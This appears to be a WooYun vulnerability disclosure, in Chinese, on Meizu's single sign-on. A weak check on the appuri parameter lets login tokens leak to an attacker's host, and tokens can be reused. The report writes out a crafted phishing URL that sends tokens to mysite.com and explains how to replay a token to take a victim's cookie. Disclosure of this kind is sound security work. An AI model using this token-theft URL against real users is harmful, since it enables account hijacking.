WooYun.org

魅族现在学习小米把产品论坛和系统论坛分开了，这就涉及到了统一登录，因此引发安全问题。
刚才大致走了一下统一登录，流程如下：
1.点击登录后进入https://member.meizu.com/sso?appuri=http%3A%2F%2Fbbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true
2.用户输入完用户名密码后提交用户名、密码、appuri等信息到https://member.meizu.com/sso/login
3. /sso/login会setcookie到meizu.com域下（全部都httponly，做的不错），接着会根据appuri跳转到http://bbs.meizu.cn/logging.php?token=特别长的token或者http://bbs.flyme.cn/login.php?token=特别长的token 处。
4. logging.php或者login.php再根据token来setcookie，最后再跳转到useruri处。
当第一步进入的url中appuri为appuri=http%3A%2F%2Fwww.baidu.com?bbs.meizu.cn%2Flogging.php 时，在第三步时会带着特别长的token跳转到www.baidu.com?bbs.meizu.cn%2Flogging.php处，拿着这个token请求logging.php或login.php就OK了
假如我给QQ群或微博之类的地方发一个https://member.meizu.com/sso?appuri=http%3A%2F%2Fmysite.com?bbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true 【短链接后效果更好】，其他用户点击后进入魅族官方的登录页面（https，域名是meizu.com），那么大部分人应该就输入用户名密码了。之后我在mysite.com的页面里直接302跳到魅族论坛【此时我已经拿到token了】，然后再带着token请求logging.php或login.php就可以拿到用户的cookie了，而且整个过程中用户基本没法发现异常。
另外，发现一个token可以请求多次。难道token不应该是生成随机字符串存入memcache/redis一次验证后就删除掉的吗？